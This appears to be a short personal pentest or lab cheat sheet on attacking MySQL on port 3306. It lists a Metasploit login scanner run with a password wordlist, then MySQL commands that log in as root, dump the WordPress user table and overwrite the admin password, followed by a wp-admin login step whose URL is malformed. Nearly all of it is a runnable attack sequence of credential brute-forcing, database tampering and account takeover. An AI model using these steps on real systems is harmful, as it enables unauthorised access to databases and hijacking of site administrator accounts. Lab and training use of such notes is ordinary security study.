win-mysql.md

SQL

• port : 3306
• auxiliary/scanner/mysql/mysql_login
• set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
• sample exploitation strategy after identifying sql password
• mysql -u root -p -h 10.0.25.212
  • show databases;
  • use wordpress;
  • show tables;
  • select * from wp_users;
  • UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
  • After changing WP-ADMIN password, login to the portal - http:///8585/wordpress/wp-admin